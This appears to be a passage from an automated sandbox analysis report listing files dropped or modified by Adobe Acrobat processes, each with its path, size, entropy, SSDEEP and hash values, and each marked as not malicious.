MD5: | ACE100943F8B1191EF95582ADFA4A82C |
SHA1: | C6985B25FCD166AAE1A4C21D5E776BBE4308FD40 |
SHA-256: | ECB9D83133C3D4BE1CDA97D9A4BC9D231FF9E77E707394F5FAD1D2730631A107 |
SHA-512: | 68E833DD846DEB5AC998837DAB2E483FDC6DCEA19D582086565034F0A6F041A289C79D89CCCCBDB62E3BBBF1B303939BCF0365D3C7ED403C32C6CE308331E4C4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.275372245542756 |
Encrypted: | false |
SSDEEP: | 6:iO4bSVa9NAQ+q2Pwkn2nKuAl9OmbnIFUtSbSjUTAgZmwsbSjUTAQVkwOwkn2nKui:7+SYAVvYfHAahFUt0SjOAg/aSjOAI5JK |
MD5: | 7D08A333C4F445F8C70B117D1DE859FE |
SHA1: | 36647B0A17A8167FE39EC464EAD12F5BB5063AD9 |
SHA-256: | 280D51232AD166DF7FC2D8F8861C7FA5C65262B438BCB0DF7C704D2584A78154 |
SHA-512: | 1294635C9149D395BF75086D76C74344A8799C4664F8F8EBA0C87492356ADE5B8DF6AE07B36257DDF1F6D13BC29B7C368A384D1379F923B4045E556A8E5D99A3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.275372245542756 |
Encrypted: | false |
SSDEEP: | 6:iO4bSVa9NAQ+q2Pwkn2nKuAl9OmbnIFUtSbSjUTAgZmwsbSjUTAQVkwOwkn2nKui:7+SYAVvYfHAahFUt0SjOAg/aSjOAI5JK |
MD5: | 7D08A333C4F445F8C70B117D1DE859FE |
SHA1: | 36647B0A17A8167FE39EC464EAD12F5BB5063AD9 |
SHA-256: | 280D51232AD166DF7FC2D8F8861C7FA5C65262B438BCB0DF7C704D2584A78154 |
SHA-512: | 1294635C9149D395BF75086D76C74344A8799C4664F8F8EBA0C87492356ADE5B8DF6AE07B36257DDF1F6D13BC29B7C368A384D1379F923B4045E556A8E5D99A3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 333 |
Entropy (8bit): | 5.202041647193992 |
Encrypted: | false |
SSDEEP: | 6:iO4b3jL+q2Pwkn2nKuAl9Ombzo2jMGIFUtSbkH3j1ZmwsbdjLVkwOwkn2nKuAl97:7++vYfHAa8uFUt0kH3j1/adF5JfHAa8z |
MD5: | F3C8CCB26672A9EE07F948ECD6C1D7F8 |
SHA1: | DAE8CFAEC7869653D8505AF3FD840A4EAA9D2254 |
SHA-256: | 823CF541AB35117CB3819CFD0D8975270FE145EC5E77F801502841461D919C23 |
SHA-512: | 49311311BA1B441CDF5C49CF7160AFC8E2D3955CA544BD8C44D32DDAFFE21906E2E05BF75476AB419595781D66FDD7E8F181C5351658D1A7AE62561587E004C0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 333 |
Entropy (8bit): | 5.202041647193992 |
Encrypted: | false |
SSDEEP: | 6:iO4b3jL+q2Pwkn2nKuAl9Ombzo2jMGIFUtSbkH3j1ZmwsbdjLVkwOwkn2nKuAl97:7++vYfHAa8uFUt0kH3j1/adF5JfHAa8z |
MD5: | F3C8CCB26672A9EE07F948ECD6C1D7F8 |
SHA1: | DAE8CFAEC7869653D8505AF3FD840A4EAA9D2254 |
SHA-256: | 823CF541AB35117CB3819CFD0D8975270FE145EC5E77F801502841461D919C23 |
SHA-512: | 49311311BA1B441CDF5C49CF7160AFC8E2D3955CA544BD8C44D32DDAFFE21906E2E05BF75476AB419595781D66FDD7E8F181C5351658D1A7AE62561587E004C0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.950908693752171 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqgWsBdOg2Hecaq3QYiubInP7E4T3y:Y2sRdsZdMHh3QYhbG7nby |
MD5: | 5578EF87DA6ECB594BE58C79D0572E58 |
SHA1: | 5167A750DE27FB09CE36A20CD4E1E8EFEE88F927 |
SHA-256: | 80C5B6C66F94902CA9280224A719A088C89E2E769E26E6227A6BE7817D6342C8 |
SHA-512: | D5924A540987CE1E6C2C1643F4B973D3B3F28A71D540192FCE1E3B2DBA8DB2C1A1FA954BC5F09C7550535E9DD6B4927142DC9F965A692E674EF029279B94D21E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d59d86ec-663a-4ec8-a61b-e4e6a0639948.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.950908693752171 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqgWsBdOg2Hecaq3QYiubInP7E4T3y:Y2sRdsZdMHh3QYhbG7nby |
MD5: | 5578EF87DA6ECB594BE58C79D0572E58 |
SHA1: | 5167A750DE27FB09CE36A20CD4E1E8EFEE88F927 |
SHA-256: | 80C5B6C66F94902CA9280224A719A088C89E2E769E26E6227A6BE7817D6342C8 |
SHA-512: | D5924A540987CE1E6C2C1643F4B973D3B3F28A71D540192FCE1E3B2DBA8DB2C1A1FA954BC5F09C7550535E9DD6B4927142DC9F965A692E674EF029279B94D21E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.255549890600895 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7joLkMYtW5:etJCV4FiN/jTN/2r8Mta02fEhgO73go0 |
MD5: | 03F1F3A55643152E6C9A57867870C34F |
SHA1: | 1BA57E41851FF6A84BB40347A759E8061BB17201 |
SHA-256: | 27ED244A64F4EE6ACF38DE0E1FFB4373B7EBEC52DF69B4C0D09211565AA16B13 |
SHA-512: | 8CA83D709B3521A85D92A90DB16163580FEF63B50613119E8DF22414A8FDD0FB27DF87B0D96CD6E484E88850A1443D124CCF2B6C7FFCCA628FC5DCC6680B89FE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 321 |
Entropy (8bit): | 5.191840846088284 |
Encrypted: | false |
SSDEEP: | 6:iO4bOX1L+q2Pwkn2nKuAl9OmbzNMxIFUtSbYIS1ZmwsbYUhLVkwOwkn2nKuAl9Ob:7+/vYfHAa8jFUt0A1/ap5JfHAa84J |
MD5: | C8A60F3CAD541F71EC9BBA40B4EACAF6 |
SHA1: | 42CECBC1A89057E0CFAF0F265946D6EBE23A317C |
SHA-256: | 1EE64DB9034B44237E58F37E852C91B5E29C961A356878A21B4FB900F51DAC57 |
SHA-512: | 96A14E46BFA1413A5E9DB7AB2DA82B4C4EE9AD2EC72D7A72118FCA86C2B6FA6E260CE00B0371126EC203794C3836FFE43E9EFAB83340605C20E45358B78ABE41 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 321 |
Entropy (8bit): | 5.191840846088284 |
Encrypted: | false |
SSDEEP: | 6:iO4bOX1L+q2Pwkn2nKuAl9OmbzNMxIFUtSbYIS1ZmwsbYUhLVkwOwkn2nKuAl9Ob:7+/vYfHAa8jFUt0A1/ap5JfHAa84J |
MD5: | C8A60F3CAD541F71EC9BBA40B4EACAF6 |
SHA1: | 42CECBC1A89057E0CFAF0F265946D6EBE23A317C |
SHA-256: | 1EE64DB9034B44237E58F37E852C91B5E29C961A356878A21B4FB900F51DAC57 |
SHA-512: | 96A14E46BFA1413A5E9DB7AB2DA82B4C4EE9AD2EC72D7A72118FCA86C2B6FA6E260CE00B0371126EC203794C3836FFE43E9EFAB83340605C20E45358B78ABE41 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.445233316932586 |
Encrypted: | false |
SSDEEP: | 384:Sewci5t0iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Ijs3OazzU89UTTgUL |
MD5: | 0879412C18D8994EC49514D67E8949DE |
SHA1: | FB7B55C29D845596C1C8A70032BD12F09838A38B |
SHA-256: | 94A7994A8AFC9857BE6F78A31E2D7F52E809535611E7D9FABB64A85A363C4A27 |
SHA-512: | 02BED4917E1255AFD7E63548BCC018A6412CFF6CF1A1B5CA70EF97C6B5DDAAC39FF8E4593BF7DC11BAA31359C9DCE5C03E79B5F4FB5E304084AEC412CFE8BCCF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2148819566634135 |
Encrypted: | false |
SSDEEP: | 24:7+tYjnuwKVqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MF:7M8nCVqvmFTIF3XmHjBoGGR+jMz+Lho |
MD5: | 2933F7EBE9177EF0486E82F2AB5457C8 |
SHA1: | D8760AA39542E2C0F0A2A1C6D9FA78CFD9D739AB |
SHA-256: | F3A52E48B279F78AF42FA4A331E22657C1809B0D7C7D38985730658913E08060 |
SHA-512: | 4076EAB2C058637DE8424F0D1335199660FC2285DA707939A4B2E82DFF387EDE990D77798C27809080605A478EA0C911EFBBF9DFAA80AD84E87B5848E8F977E5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7237529899615143 |
Encrypted: | false |
SSDEEP: | 3:kkFkl4HllltfllXlE/HT8kkbNNX8RolJuRdxLlGB9lQRYwpDdt:kKhHteT8RNMa8RdWBwRd |
MD5: | 5F593A31E72FB7BFE47F0F133ED97ADC |
SHA1: | 662F54C4F7A9FF3D5A11F8FCF4811F1D930465AB |
SHA-256: | 09FD15C5EA70A456393AF107B11D65BC538865D1252DC18BC70004FCA762D2D7 |
SHA-512: | F1FBEADAF54E1FB4BE3635CCF4F16BA6067CA04187E7E471F6E60902B980F2BED9CDFDE74A996EBB9F46053F957128E9956903F1D7832132A3B76046F3A9F8BC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.387070125474571 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJM3g98kUwPeUkwRe9:YvXKXPUXeZc0vIGMbLUkee9 |
MD5: | 0D82DD2E9FC86B3B50DA69287A6C2D41 |
SHA1: | 2BF7297432CD043AE9357BC9D8E1A740DCF4DFF5 |
SHA-256: | D9EEBEFF9D0C2BEE2DEDD2CE377C5E8D554E9448397F552443714E66FF7E10FA |
SHA-512: | 3CF21AE59B15793969286D04B4BDD0788513CCEDA908556A84B0A002205A3A439E747D6000315B1BBC448E23907F9C4BEF6DAA9ED13202EAEE1AC8AF1CDEF74F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.336649737063169 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfBoTfXpnrPeUkwRe9:YvXKXPUXeZc0vIGWTfXcUkee9 |
MD5: | 466CF2D6F42CB13389485D02970CB67F |
SHA1: | 3107B6889CE61F6646AD8A6C77F411660B6575FA |
SHA-256: | 8F35118279AB3ABE6D921C7DABF0F48B65316576637C0CE8B55EFD3708D08EF9 |
SHA-512: | E59E328B78ACD0FB9A6263BB894E15061EF36036106ADB4BFE76242EE949A91B5B5EC539BBDF62FAC7147A1244DC2CBCEEF023561A3332136D92CDB6BFB1FDDB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.315644772458246 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfBD2G6UpnrPeUkwRe9:YvXKXPUXeZc0vIGR22cUkee9 |
MD5: | FBE1B71239C950E0CF5857CB1F9B58A3 |
SHA1: | 8F6C95A25385120DEC5A901A10063BA7A63E36ED |
SHA-256: | 60D483705777052635C4F50DC14E8B12CDD90FD9F1181002F163D48C6F1F3B77 |
SHA-512: | B5243D1E01FD2EE329D422EB14B242E3C340A9F2FAB2A007A03FB5B060E469AAB6B7DE43C7E2CAB243E04493A416BED5B2AF06EE36F304B7DBC14D200D78A260 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.37491244707876 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfPmwrPeUkwRe9:YvXKXPUXeZc0vIGH56Ukee9 |
MD5: | 6B40148EDA87D6C9EE2818779F452BE9 |
SHA1: | 7FEE75B21FE3984F67F4265F25E15E572393D248 |
SHA-256: | 3ECCD76C3D38D1580FA52418871C4E9DD8C5A38940A2AD9AAE2D238539875850 |
SHA-512: | 5C0E61A87CBDC4632A58C2079E3A0F815EDDB533642FA0A53711DED1A47F26D17D0100C360E376B56876C1B75C7E4D914B017C3E2C64AB6F69B6AA1F2A8A2B35 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.6909714137254035 |
Encrypted: | false |
SSDEEP: | 24:Yv6X6ezvFpLgE9cQx8LennAvzBvkn0RCmK8czOCCSmhYn:YvW9hgy6SAFv5Ah8cv/mOn |
MD5: | 1A67283521E39D546090A954E588624A |
SHA1: | C32581C1E6772CAF88C971ED2BD56C10CC33E7DB |
SHA-256: | D644B6E9AF156A0BE0695F833E1D8966EB532CB5DC234A617E282CDC6804EA6F |
SHA-512: | 183BCF426101C7F170C55EA5DFFD21FC65E1889AB1B6E224D7E9397D638209F0FEFBE45F826C796628CDD90C13A38A1CF01828F2B86DF5427642F07FCC1CBC9B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.320460308612884 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJf8dPeUkwRe9:YvXKXPUXeZc0vIGU8Ukee9 |
MD5: | 9716CE27DA51C5A1B354AC1009A80D0B |
SHA1: | 001A2000805750866BB8721640B1E5E2089665B6 |
SHA-256: | 1AA19C6FA0194743F51140BA54ADCC72200F04DF084F55D33BFAEB075EBFA165 |
SHA-512: | 0CCEBD6E62D3A7808ECC1560E2513D444C9D0B4A67754302EC2F5A613D4F0A93CA95EAFB04C21ADA90C262ECDC6406AD8FB9CC9BA1453A8971BBC269FDAC9BD3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.323841738205637 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfQ1rPeUkwRe9:YvXKXPUXeZc0vIGY16Ukee9 |
MD5: | F9F229E48D10FD102EC13E80A1CDC404 |
SHA1: | 018B4937C53306F0D592DAE9E4CF6DDA15393024 |
SHA-256: | 72EAA5C95142F01AE4B605F40F52AB3AD2BAF9142B2504E179C0026CA4F0064B |
SHA-512: | C3073F3C85D54731F0B5ED3BDDA626E4B3158F39299E85138D5397E63AF8A7F3F2F1146F638BFE8D897B44461804FC082D4828B1025C3CBD4B5AC879B52B97A2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.328427455506176 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfFldPeUkwRe9:YvXKXPUXeZc0vIGz8Ukee9 |
MD5: | EBC05E10C4239A63BC2F4BA4485812D5 |
SHA1: | BE5C058C6F457EF42DC9E92958B77A793DF17E9D |
SHA-256: | 0FD2E9B36B715E98B7C1BA393387C5C776A75DFC44D1E95D5FA4689C276CFE59 |
SHA-512: | A5F9F2744408945F265E9BE8C7472968EC82BB268FDCBD4D7BB9A6ACC2D434084BEE29160DA5D906969DF5F1AE9079BD9DF95754676C308B8EAC84AE6DFC728C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.345361283148454 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfzdPeUkwRe9:YvXKXPUXeZc0vIGb8Ukee9 |
MD5: | E5365503E825785278D0BA3C2A6E26B7 |
SHA1: | 9719D0C9148BB51846F7899926A4ED9DD91D5049 |
SHA-256: | A02A4AD835FE222FFA4DA0EB51ED2B7F4634401AA3A31549AFDE689C71122966 |
SHA-512: | B0D69F4AFDDAC3F2069F19F89A140E705A915E119C96B1FD5F4734E8FA04B80740046B08384A506CB17A35E4B0B399575A98F5BD5D757E680EE987D6F5EB589D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.326250951700443 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfYdPeUkwRe9:YvXKXPUXeZc0vIGg8Ukee9 |
MD5: | A726E2CA36A8C18EBBED22927A5CD2ED |
SHA1: | 6B9D59878C36E38B1D387698634D54F16C2095B0 |
SHA-256: | 64ED7727F89EBA42F71BF370C3D913C340AF6D582353EB2B961E4929A37BD237 |
SHA-512: | 182333D700D53A80BB4355D812F59992CC728C0EE98B9BDD71C34BC43D1391E16515515BB409F8E309A348766830B6E27D4FC863C753E25EB18B468EDEBC9045 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.313062480093571 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJf+dPeUkwRe9:YvXKXPUXeZc0vIG28Ukee9 |
MD5: | 3149B0E8449A46F6D9D061A4B7130F5C |
SHA1: | 4785491648B1D2329A3A47315C470D7653222F68 |
SHA-256: | 59DF6674AE2423D285B18FBB1A6E252507862075D53A8268308174B115851AA3 |
SHA-512: | EC49695130A7BA352455CDD4398E44E880044FB9BAE7570D962A045ED2739ECDC44C7C09C472B25A6DAB0799420899FCEDC68404B53849E3C68BA7A94B262397 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.3096176304622755 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfbPtdPeUkwRe9:YvXKXPUXeZc0vIGDV8Ukee9 |
MD5: | F45F56E2BD323D74E71EF1B8FCD4B678 |
SHA1: | 4B1533371A62402BB652847AAAFDBF692E7DE85C |
SHA-256: | 87D5DCB4B4F9B3946CE392F1B6FED11C83D3EFC0D7451CFEDD05177B432B436B |
SHA-512: | F6ADBE806B50596C3D3E294C43E0B82CAE5290803863A6C7AA076B68806482D763EE64429F9B4FB46F603AC928BBCFCB6E6F274F352AAB190CBE3789E42598FA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.314318054860765 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJf21rPeUkwRe9:YvXKXPUXeZc0vIG+16Ukee9 |
MD5: | 59091A2DF8D596690B241BB935354AB1 |
SHA1: | CB0EF06B0A2499B0E15DA69F09119F905E6488CB |
SHA-256: | CC5DAC20971B506C576953C30092A96AAA5EF2D546DCF973BA9F71812D6F1B5F |
SHA-512: | 32CCC4B89AB1EF81CA6A98696CA687F4586E6D39928DEB4217D36EB530A96810B1BBC10B76208B0E154FDE8A9AE80339CFCABE73CB8CD1BF5FAEB7B1CEE95AFD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
